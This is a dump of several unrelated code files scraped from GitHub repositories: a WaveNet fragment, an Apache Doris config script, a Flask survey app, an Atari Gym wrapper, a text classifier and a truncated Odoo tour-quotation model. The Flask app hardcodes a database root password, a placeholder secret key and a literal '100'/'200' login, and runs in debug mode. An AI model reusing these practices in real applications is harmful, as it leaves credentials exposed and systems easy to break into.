tf.control_dependencies([adam_optimize]):\r\n # Create the shadow variables and add ops to maintain moving averages\r\n # Also updates moving averages after each update step\r\n # This is the optimize call instead of traditional adam_optimize one.\r\n assert tuple(tf.trainable_variables()) == variables # Verify all trainable variables are being averaged\r\n self.optimize = self.ema.apply(variables)\r\n","repo_name":"YunhoJung/tobigs-rhapsody-speech-synthesis","sub_path":"model/wavenet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72687389221","text":"import time\nimport threading\n\nimport env_config\nimport execute\n\n\ndef modify_config(host_name, filepath, option, value):\n \"\"\"Modify a config option\n \"\"\"\n cmd = \"grep -q '^{option}' {filepath} && \" \\\n \"sed -i 's/^{option}.*/{option} = 
{value}/g' {filepath} || \" \\\n \"echo '{option} = {value}' >> {filepath}\".format(\n option=option, value=value, filepath=filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status != 0:\n return False\n cmd = \"grep -q '^{} = {}' {}\".format(option, value, filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status != 0:\n return False\n return True\n\n\ndef remove_config(host_name, filepath, option):\n \"\"\"Remove a config option\n \"\"\"\n cmd = 'sed -i \"s/^%s.*/ /\" %s' % (option, filepath)\n execute.exe_cmd(cmd, host_name)\n cmd = \"grep -q '^{}' {}\".format(option, filepath)\n status, output = execute.exe_cmd(cmd, host_name)\n if status == 0:\n return False\n return True\n\n\ndef modify_be_config(host_name, path, option, value):\n \"\"\"\n modify be config\n \"\"\"\n filepath = '%s/conf/be.conf' % path\n return modify_config(host_name, filepath, option, value)\n\n\ndef config_one_be(host_name):\n \"\"\"config one be\n \"\"\"\n filepath = '%s/be/conf/be.conf' % env_config.be_path\n modify_config(host_name, filepath, 'be_port', env_config.be_port)\n modify_config(host_name, filepath, 'webserver_port', env_config.webserver_port)\n modify_config(host_name, filepath, 'heartbeat_service_port', env_config.heartbeat_service_port)\n modify_config(host_name, filepath, 'be_rpc_port', env_config.be_rpc_port)\n modify_config(host_name, filepath, 'brpc_port', env_config.brpc_port)\n time.sleep(3)\n\n\ndef config_be():\n \"\"\"config be\n \"\"\"\n config_be_threads = []\n for host_name in env_config.be_list + env_config.dynamic_add_be_list:\n t = threading.Thread(target=config_one_be, args=(host_name,))\n t.start()\n config_be_threads.append(t)\n\n for t in config_be_threads:\n t.join()\n\n\nif __name__ == '__main__':\n config_be()\n","repo_name":"apache/doris","sub_path":"pytest/deploy/config_be.py","file_name":"config_be.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":10091,"dataset":"github-code","pt":"35"}
+{"seq_id":"42942837964","text":"from flask import Flask, render_template, request, redirect, url_for, flash\r\nfrom flask_mysqldb import MySQL\r\nimport plotly.graph_objs as go\r\nfrom plotly.offline import plot\r\n\r\napp = Flask(__name__)\r\napp.config['MYSQL_HOST'] = 'localhost'\r\napp.config['MYSQL_USER'] = 'root'\r\napp.config['MYSQL_PASSWORD'] = 'ABHI@1289' \r\napp.config['MYSQL_DB'] = 'flaskapp'\r\napp.config['SECRET_KEY'] = 'secret_key'\r\napp.config['TEMPLATES_AUTO_RELOAD'] = True\r\n\r\nmysql = MySQL(app)\r\n\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('form.html')\r\n\r\n\r\n@app.route('/submit', methods=['POST'])\r\ndef submit():\r\n name = request.form['name']\r\n age = request.form['age']\r\n gender = request.form['gender']\r\n mobile = request.form['mobile']\r\n grade = request.form['grade']\r\n\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"INSERT INTO users(name, age, gender, mobile, grade) VALUES(%s, %s, %s, %s, %s)\",\r\n (name, age, gender, mobile, grade))\r\n mysql.connection.commit()\r\n cur.close()\r\n\r\n flash('Submitted successfully!', 'success')\r\n return redirect(url_for('index'))\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if request.method == 'POST':\r\n userid = request.form['userid']\r\n password = request.form['password']\r\n if userid == '100' and password == '200':\r\n return redirect(url_for('data'))\r\n else:\r\n flash('Invalid credentials!', 'error')\r\n return redirect(url_for('login'))\r\n return 
render_template('login.html')\r\n\r\n\r\n@app.route('/data')\r\ndef data():\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"SELECT COUNT(*) FROM users\")\r\n total_users = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 0 AND 10\")\r\n age_0_10 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 11 AND 20\")\r\n age_11_20 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE age BETWEEN 21 AND 30\")\r\n age_21_30 = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE gender='Male'\")\r\n male_count = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE gender='Female'\")\r\n female_count = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE mobile='Yes'\")\r\n mobile_yes = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE mobile='No'\")\r\n mobile_no = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='A'\")\r\n grade_a = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='B'\")\r\n grade_b = cur.fetchone()[0]\r\n\r\n cur.execute(\"SELECT COUNT(*) FROM users WHERE grade='C'\")\r\n grade_c = cur.fetchone()[0]\r\n\r\n cur.close()\r\n\r\n age_labels = ['0-10', '11-20', '21-30']\r\n age_values = [age_0_10, age_11_20, age_21_30]\r\n\r\n gender_labels = ['Male', 'Female']\r\n gender_values = [male_count, female_count]\r\n\r\n mobile_labels = ['Yes', 'No']\r\n mobile_values = [mobile_yes, mobile_no]\r\n\r\n grade_labels = ['A', 'B', 'C']\r\n grade_values = [grade_a, grade_b, grade_c]\r\n\r\n age_chart_labels = age_labels\r\n age_chart_values = age_values\r\n gender_chart_labels = gender_labels\r\n gender_chart_values = gender_values\r\n mobile_chart_labels = mobile_labels\r\n mobile_chart_values = mobile_values\r\n grade_chart_labels = grade_labels\r\n grade_chart_values = grade_values\r\n\r\n return render_template('data.html', total_users=total_users,\r\n age_chart_labels=age_chart_labels, age_chart_values=age_chart_values,\r\n gender_chart_labels=gender_chart_labels, gender_chart_values=gender_chart_values,\r\n mobile_chart_labels=mobile_chart_labels, mobile_chart_values=mobile_chart_values,\r\n grade_chart_labels=grade_chart_labels, grade_chart_values=grade_chart_values)\r\n\r\ndef create_pie_chart(labels, values, title):\r\n data = [go.Pie(labels=labels, values=values)]\r\n layout = go.Layout(title=title)\r\n\r\n fig = go.Figure(data=data, layout=layout)\r\n chart_data = plot(fig, output_type='div', include_plotlyjs=False)\r\n\r\n return chart_data\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","repo_name":"pavankalyan75/khub-problem-statement","sub_path":"prooo/KHUB Pro/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7210941116","text":"import time\nimport numpy as np\nN = 10000000\n\ndef addVectors(v1:np.ndarray ,v2: np.ndarray):\n v3: np.ndarray = np.ones(N)\n for i in range(len(v1)):\n v3[i] = v1[i] + v2[i]\n return v3\n\ndef main():\n ones: np.ndarray = np.ones(N)\n negativeONes: np.ndarray = np.ones(N)*-1\n \n start = time.time()\n zeros: np.ndarray = addVectors(ones,negativeONes)\n end = time.time()\n print(\"Elapsed = %s\" % (end - start))\n \n\n if(zeros.size != N):\n raise Exception(\"Summed Vector is Wrong Size\")\n \n if not(np.array_equal(zeros,np.zeros(N))):\n raise Exception(\"Incorrect 
Summation for Zeros\")\n\n print(\"Completed Summation\")\n\nmain()\n","repo_name":"InvincibleRMC/csds438final","sub_path":"serial.py","file_name":"serial.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15656010500","text":"\nimport pandas as pd\nfrom pandas import Series, DataFrame\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport os\nimport re\nimport jieba\n\n# Get all the documents\ndef getfilelist(root_path):\n file_path_list=[]\n file_name=[]\n walk = os.walk(root_path)\n for root, dirs, files in walk:\n for name in files:\n filepath = os.path.join(root, name)\n file_name.append(name)\n file_path_list.append(filepath)\n # print(file_name)\n # print(file_path_list)\n # print(len(file_path_list))\n return file_path_list\n\n\nclass Question_classify():\n def __init__(self):\n '''\n Initialization\n '''\n self.train_x,self.train_y=self.read_train_data() # read the training data\n self.model=self.train_model_NB() # train the model\n\n def read_train_data(self):\n '''\n Get the training data\n '''\n train_x=[]\n train_y=[]\n file_list=getfilelist(\"./data/question/\")\n\n # search all the files\n for one_file in file_list:\n # get the number\n num = re.sub(r'\\D', \"\", one_file)\n if str(num).strip()!=\"\":\n label_num=int(num) # set the tag\n with(open(one_file,\"r\",encoding=\"utf-8\")) as fr: # read the file context\n data_list=fr.readlines()\n for one_line in data_list:\n word_list=list(jieba.cut(str(one_line).strip()))\n train_x.append(\" \".join(word_list))\n train_y.append(label_num)\n return train_x,train_y\n\n def train_model_NB(self):\n '''\n train the model: Naive Bayes\n '''\n X_train, y_train = self.train_x, self.train_y\n self.tv = TfidfVectorizer()\n\n train_data = self.tv.fit_transform(X_train).toarray()\n clf = MultinomialNB(alpha=0.01)\n clf.fit(train_data, y_train)\n return clf\n\n def predict(self,question):\n '''\n function for prediction\n '''\n question=[\" \".join(list(jieba.cut(question)))]\n test_data=self.tv.transform(question).toarray()\n y_predict = self.model.predict(test_data)[0]\n # print(\"question type:\",y_predict)\n return y_predict\n\nif __name__ == '__main__':\n qc=Question_classify()\n qc.predict(\"张学友的个人信息\")\n","repo_name":"ZaccWu/QA-based-on-web","sub_path":"KGClass.py","file_name":"KGClass.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"2972886581","text":"\r\nimport gym\r\nimport random\r\nimport time\r\nimport numpy as np\r\nimport cv2\r\n\r\nfrom threading import Thread\r\nfrom multiprocessing import Process, Pipe\r\nfrom queue import Queue\r\n\r\nfrom history import History\r\n\r\n\r\nclass Env(object):\r\n def __init__(self, config):\r\n self.cf = config\r\n self.game = self.cf.game\r\n self.history = History(self.cf)\r\n self.env = gym.make(self.game + self.cf.env_versions)\r\n self.action_n = self.env.action_space.n\r\n self._obs = np.zeros((2,) + self.env.observation_space.shape, dtype=np.uint8)\r\n self.real_done = True\r\n print('env: ', self.game, self.action_n)\r\n\r\n def reset(self):\r\n self.history.clear()\r\n self._obs[:] = 0\r\n if not self.real_done:\r\n s, r, d = self.act(0)\r\n else:\r\n obs = self.env.reset()\r\n self._obs_add(obs)\r\n no_op = random.randint(1, self.cf.no_op_max - 1)\r\n s, r, d = self.act(0, no_op)\r\n if d:\r\n return 
self.reset()\r\n for i in range(self.cf.history_length):\r\n self.history.add(s)\r\n return s\r\n\r\n def act(self, action, action_repeat=None, is_training=True):\r\n if action_repeat == None:\r\n action_repeat = self.cf.action_repeat\r\n start_lives = self.lives\r\n total_r = 0\r\n for i in range(action_repeat):\r\n obs, r, d, info = self.env.step(action)\r\n s = self._obs_add(obs)\r\n self.real_done = d\r\n total_r += r\r\n \r\n if is_training:\r\n if self.lives < start_lives:\r\n d = True\r\n # if self.game == 'Pong' and r == -1:\r\n # d = True\r\n if d:\r\n break\r\n\r\n self.history.add(s)\r\n return s, total_r, d\r\n\r\n def sample_action(self):\r\n return self.env.action_space.sample()\r\n\r\n def close(self):\r\n return self.env.close()\r\n\r\n def _obs_add(self, obs):\r\n self._obs[0] = self._obs[1]\r\n self._obs[1] = obs\r\n state = np.max(self._obs, axis=0)\r\n\r\n state = cv2.resize(cv2.cvtColor(state, cv2.COLOR_RGB2GRAY), tuple(self.cf.state_shape), interpolation=cv2.INTER_AREA)\r\n return (state/255.).astype(self.cf.state_dtype)\r\n\r\n @property\r\n def lives(self):\r\n return self.env.env.ale.lives()\r\n\r\n @property\r\n def recent_states(self):\r\n return self.history.get()\r\n\r\n\r\n\r\ndef env_work_thread(remote, par_remote, config):\r\n env = Env(config)\r\n try:\r\n while True:\r\n cmd, data = par_remote.get()\r\n if cmd == 'reset':\r\n env.reset()\r\n remote.put_nowait(env.recent_states[0])\r\n elif cmd == 'act':\r\n s, r, d = env.act(data)\r\n real_done = env.real_done\r\n if d:\r\n env.reset()\r\n remote.put_nowait((env.recent_states[0], r, d, real_done))\r\n elif cmd == 'close':\r\n break\r\n elif cmd == 'render':\r\n env.env.render()\r\n else:\r\n raise NotImplementedError\r\n except Exception as e:\r\n print(e)\r\n finally:\r\n env.close()\r\n\r\nclass MultiEnv_thread(object):\r\n def __init__(self, config):\r\n print('MultiEnv_thread')\r\n self.cf = config\r\n nenvs = self.cf.nenvs\r\n self.remotes, self.work_remotes = zip(*[[Queue(1), Queue(1)] for i in range(nenvs)])\r\n self.ps = [Thread(target=env_work_thread, args=(wr, r, self.cf)) \\\r\n for (wr, r) in zip(self.work_remotes, self.remotes)]\r\n for p in self.ps:\r\n p.daemon = True\r\n p.start()\r\n time.sleep(1)\r\n\r\n def reset(self):\r\n for r in self.remotes:\r\n r.put_nowait(('reset', None))\r\n results = [remote.get() for remote in self.work_remotes]\r\n s = results\r\n return np.stack(s)\r\n\r\n def act(self, actions):\r\n for remote, action in zip(self.remotes, actions):\r\n remote.put_nowait(('act', action))\r\n results = [remote.get() for remote in self.work_remotes]\r\n s, r, d, real_done = zip(*results)\r\n return np.stack(s), np.stack(r), np.stack(d), np.stack(real_done)\r\n\r\n def render(self):\r\n for r in self.remotes: \r\n r.put_nowait(('render', None))\r\n\r\n def close(self):\r\n for r in self.remotes: \r\n r.put_nowait(('close', None))\r\n for p in self.ps:\r\n p.join()\r\n\r\n\r\n","repo_name":"wxw0/rl","sub_path":"a2c/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30334694985","text":"from odoo import models, fields, api, exceptions\nfrom ..tools.performance import timer\n\n\nclass AsianSpreadsheetOption(models.Model):\n _name = 'asian.spreadsheet.option'\n _description = 'Asian Spreadsheet Option'\n\n name = fields.Char(string='Option')\n profit = fields.Float(string='Lợi nhuận', help='Điền vào lợi nhuận. 
Eg: 100.000')\n percent_profit = fields.Float(string='Lợi nhuận (%)', help='Điền vào % lợi nhuận. Eg: 25')\n car_4 = fields.Float(string='Xe 4 chỗ', compute='_compute_car_4', store=True)\n car_7 = fields.Float(string='Xe 7 chỗ', compute='_compute_car_7', store=True)\n car_16 = fields.Float(string='Xe 16 chỗ (6)', compute='_compute_car_16', store=True)\n car_29 = fields.Float(string='Xe 29 chỗ (10)', compute='_compute_car_29', store=True)\n car_35 = fields.Float(string='Xe 35 chỗ (15)', compute='_compute_car_35', store=True)\n car_45_1 = fields.Float(string='Xe 45 chỗ (21)', compute='_compute_car_45_1', store=True)\n car_45_2 = fields.Float(string='Xe 45 chỗ (25)', compute='_compute_car_45_2', store=True)\n car_45_3 = fields.Float(string='Xe 45 chỗ (30)', compute='_compute_car_45_3', store=True)\n car_45_4 = fields.Float(string='Xe 45 chỗ', compute='_compute_car_45_4', store=True)\n single_supp = fields.Float(string='Single Supp', compute='_compute_single_supp', store=True)\n apply = fields.Boolean(string='Tính báo giá')\n is_selected = fields.Boolean(string='Đã tạo Tour', compute='_compute_is_selected', store=True)\n asian_quotation_id = fields.Many2one(string='Asian Quotation', comodel_name='asian.quotation', ondelete='cascade')\n asian_quotation_schedule_ids = fields.One2many(string='Asian Quotation Schedule', comodel_name='asian.quotation.schedule', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_product_ids = fields.One2many(string='Asian Spreadsheet Product', comodel_name='asian.spreadsheet.product', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_team_option_ids = fields.One2many(string='Asian Spreadsheet Team Option', comodel_name='asian.spreadsheet.team.option', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_net_option_ids = fields.One2many(string='Asian Spreadsheet Net Option', comodel_name='asian.spreadsheet.net.option', inverse_name='asian_spreadsheet_option_id')\n asian_spreadsheet_abroad_ids = fields.One2many(string='Asian Spreadsheet Abroad', comodel_name='asian.spreadsheet.abroad', inverse_name='asian_spreadsheet_option_id')\n template_option_id = fields.Many2one(string='Template Option', comodel_name='asian.spreadsheet.option', domain=\"[('id', 'in', domain_template_option_ids)]\")\n domain_template_option_ids = fields.Many2many(comodel_name='asian.spreadsheet.option', compute='_compute_domain_template_option_ids')\n\n @api.onchange('apply')\n def onchange_apply(self):\n if len(self.asian_quotation_id.asian_spreadsheet_option_ids.filtered(lambda o: o.apply)) > 2:\n raise exceptions.ValidationError(\"Không thể tính báo giá nhiều dòng!\")\n\n def create_quotation_schedule(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_quotation_schedule_ids:\n self.env['asian.quotation.schedule'].create({\n 'sequence': line.sequence,\n 'schedule_date': line.schedule_date,\n 'schedule_act': line.schedule_act,\n 'note': line.note,\n 'customer_market': line.customer_market,\n 'validate_season': line.validate_season,\n 'meal_supplied': line.meal_supplied,\n 'schedule_date_date': line.schedule_date_date,\n 'weekday': line.weekday,\n 'meal_ids': [(6, 0, line.meal_ids.ids)],\n 'template_id': line.template_id,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'x_day': line.x_day,\n })\n\n def create_spreadsheet_product(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_spreadsheet_product_ids:\n self.env['asian.spreadsheet.product'].create({\n 'date_number': 
line.date_number,\n 'travel_itinerary': line.travel_itinerary,\n 'hotel_price': line.hotel_price,\n 'meal_price': line.meal_price,\n 'ticket_price': line.ticket_price,\n 'show_price': line.show_price,\n 'transit_price': line.transit_price,\n 'transport_price': line.transport_price,\n 'guide_price': line.guide_price,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n\n def create_team_option(self):\n self.ensure_one()\n\n by_type = self.env['asian.spreadsheet.team.option'].create({\n 'name': 'Giá theo loại xe/KM',\n 'apply': True,\n 'type_line': 'by_type',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'car_4': self.asian_quotation_id.price_type_car_4 or self.env.ref('asian_quotation.car_4').price,\n 'car_7': self.asian_quotation_id.price_type_car_7 or self.env.ref('asian_quotation.car_7').price,\n 'car_16': self.asian_quotation_id.price_type_car_16 or self.env.ref('asian_quotation.car_16').price,\n 'car_29': self.asian_quotation_id.price_type_car_29 or self.env.ref('asian_quotation.car_29').price,\n 'car_35': self.asian_quotation_id.price_type_car_35 or self.env.ref('asian_quotation.car_35').price,\n 'car_45_1': self.asian_quotation_id.price_type_car_45_1 or self.env.ref('asian_quotation.car_45_1').price,\n 'car_45_2': self.asian_quotation_id.price_type_car_45_2 or self.env.ref('asian_quotation.car_45_2').price,\n 'car_45_3': self.asian_quotation_id.price_type_car_45_3 or self.env.ref('asian_quotation.car_45_3').price,\n 'car_45_4': self.asian_quotation_id.price_type_car_45_4 or self.env.ref('asian_quotation.car_45_4').price,\n })\n\n by_team = self.env['asian.spreadsheet.team.option'].create({\n 'name': 'Nhóm khách',\n 'apply': True,\n 'type_line': 'by_team',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n 'car_4': 2,\n 'car_7': 3,\n 'car_16': 6,\n 'car_29': 10,\n 'car_35': 15,\n 'car_45_1': 20,\n 'car_45_2': 25,\n 'car_45_3': 30,\n 'car_45_4': 35,\n })\n return True\n\n def create_net_option(self):\n net = self.env['asian.spreadsheet.net.option'].create({\n 'name': 'Giá NET/khách',\n 'apply': True,\n 'type_line': 'net',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n net_usd = self.env['asian.spreadsheet.net.option'].create({\n 'name': 'GIÁ NET USD',\n 'apply': True,\n 'type_line': 'net_usd',\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n return True\n\n def create_spreadsheet_abroad(self):\n self.ensure_one()\n for line in self.asian_quotation_id.asian_spreadsheet_abroad_ids:\n self.env['asian.spreadsheet.abroad'].create({\n 'name': line.name,\n 'profit': line.profit,\n 'percent_profit': line.percent_profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'asian_spreadsheet_option_id': self.id,\n 'asian_quotation_id': self.asian_quotation_id.id,\n })\n return True\n\n @api.model\n def create(self, values):\n res = super(AsianSpreadsheetOption, self).create(values)\n if res.apply and not self._context.get('is_asian_quotation_duplicate'):\n res.create_quotation_schedule()\n res.create_spreadsheet_product()\n res.create_team_option()\n res.create_net_option()\n res.create_spreadsheet_abroad()\n return res\n\n def write(self, values):\n res = 
super(AsianSpreadsheetOption, self).write(values)\n if 'apply' in values and values.get('apply'):\n apply_line = self.filtered(lambda o: o.apply)[:1]\n if apply_line and not apply_line.asian_quotation_schedule_ids:\n apply_line.create_quotation_schedule()\n if apply_line and not apply_line.asian_spreadsheet_product_ids:\n apply_line.create_spreadsheet_product()\n if apply_line and not apply_line.asian_spreadsheet_team_option_ids:\n apply_line.create_team_option()\n if apply_line and not apply_line.asian_spreadsheet_net_option_ids:\n apply_line.create_net_option()\n if apply_line and not apply_line.asian_spreadsheet_abroad_ids:\n apply_line.create_spreadsheet_abroad()\n return res\n\n def calc_car_x(self, net_usd_line, x):\n return getattr(net_usd_line, f'car_{x}') * (100 + self.percent_profit) / 100 + self.profit\n\n def net_usd_line(self):\n return self.asian_spreadsheet_net_option_ids.filtered(lambda o: o.type_line == 'net_usd')[:1]\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_4',\n )\n def _compute_car_4(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_4 = rec.calc_car_x(net_usd_line, '4')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_7',\n )\n def _compute_car_7(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_7 = rec.calc_car_x(net_usd_line, '7')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_16',\n )\n def _compute_car_16(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_16 = rec.calc_car_x(net_usd_line, '16')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_29',\n )\n def _compute_car_29(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_29 = rec.calc_car_x(net_usd_line, '29')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_35',\n )\n def _compute_car_35(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_35 = rec.calc_car_x(net_usd_line, '35')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_1',\n )\n def _compute_car_45_1(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_1 = rec.calc_car_x(net_usd_line, '45_1')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_2',\n )\n def _compute_car_45_2(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_2 = rec.calc_car_x(net_usd_line, '45_2')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_3',\n )\n def _compute_car_45_3(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_3 = rec.calc_car_x(net_usd_line, '45_3')\n\n @api.depends(\n 'profit',\n 'percent_profit',\n 'asian_quotation_id.asian_spreadsheet_net_option_ids.car_45_4',\n )\n def _compute_car_45_4(self):\n for rec in self:\n net_usd_line = rec.net_usd_line()\n rec.car_45_4 = rec.calc_car_x(net_usd_line, '45_4')\n\n def action_copy_option(self):\n asian_quotation_schedule_ids = [(5, 0, 0)]\n asian_spreadsheet_product_ids = [(5, 0, 0)]\n asian_spreadsheet_team_option_ids = [(5, 0, 0)]\n asian_spreadsheet_net_option_ids = [(5, 0, 0)]\n asian_spreadsheet_abroad_ids = [(5, 0, 0)]\n for line in 
self.template_option_id.asian_quotation_schedule_ids:\n asian_quotation_schedule_ids.append(\n (0, 0, {\n 'sequence': line.sequence,\n 'schedule_date': line.schedule_date,\n 'schedule_act': line.schedule_act,\n 'note': line.note,\n 'customer_market': line.customer_market,\n 'validate_season': line.validate_season,\n 'meal_supplied': line.meal_supplied,\n 'schedule_date_date': line.schedule_date_date,\n 'weekday': line.weekday,\n 'meal_ids': [(6, 0, line.meal_ids.ids)],\n 'asian_spreadsheet_option_id': self.id,\n 'x_day': line.x_day,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_product_ids:\n asian_spreadsheet_product_ids.append(\n (0, 0, {\n 'date_number': line.date_number,\n 'travel_itinerary': line.travel_itinerary,\n 'hotel_price': line.hotel_price,\n 'vendor_id': line.vendor_id.id,\n 'hotel_id': line.hotel_id.id,\n 'meal_price': line.meal_price,\n 'ticket_price': line.ticket_price,\n 'show_price': line.show_price,\n 'transit_price': line.transit_price,\n 'transport_price': line.transport_price,\n 'guide_price': line.guide_price,\n 'sequence': line.sequence,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_team_option_ids:\n asian_spreadsheet_team_option_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'apply': line.apply,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n\n for line in self.template_option_id.asian_spreadsheet_net_option_ids:\n asian_spreadsheet_net_option_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'apply': line.apply,\n 'type_line': line.type_line,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n for line in self.template_option_id.asian_spreadsheet_abroad_ids:\n asian_spreadsheet_abroad_ids.append(\n (0, 0, {\n 'name': line.name,\n 'profit': line.profit,\n 'percent_profit': line.percent_profit,\n 'car_4': line.car_4,\n 'car_7': line.car_7,\n 'car_16': line.car_16,\n 'car_29': line.car_29,\n 'car_35': line.car_35,\n 'car_45_1': line.car_45_1,\n 'car_45_2': line.car_45_2,\n 'car_45_3': line.car_45_3,\n 'car_45_4': line.car_45_4,\n 'asian_quotation_id': line.asian_quotation_id.id,\n 'asian_spreadsheet_option_id': self.id,\n })\n )\n self.write({\n 'asian_quotation_schedule_ids': asian_quotation_schedule_ids,\n 'asian_spreadsheet_product_ids': asian_spreadsheet_product_ids,\n 'asian_spreadsheet_team_option_ids': asian_spreadsheet_team_option_ids,\n 'asian_spreadsheet_net_option_ids': asian_spreadsheet_net_option_ids,\n 'asian_spreadsheet_abroad_ids': asian_spreadsheet_abroad_ids,\n 'apply': self.apply,\n })\n\n @api.depends('asian_quotation_id.sale_order_ids', 'asian_quotation_id.sale_order_ids.state')\n def _compute_is_selected(self):\n for rec in self:\n rec.is_selected = bool(rec.asian_quotation_id.sale_order_ids.filtered(lambda o: o.state != 'cancel' 
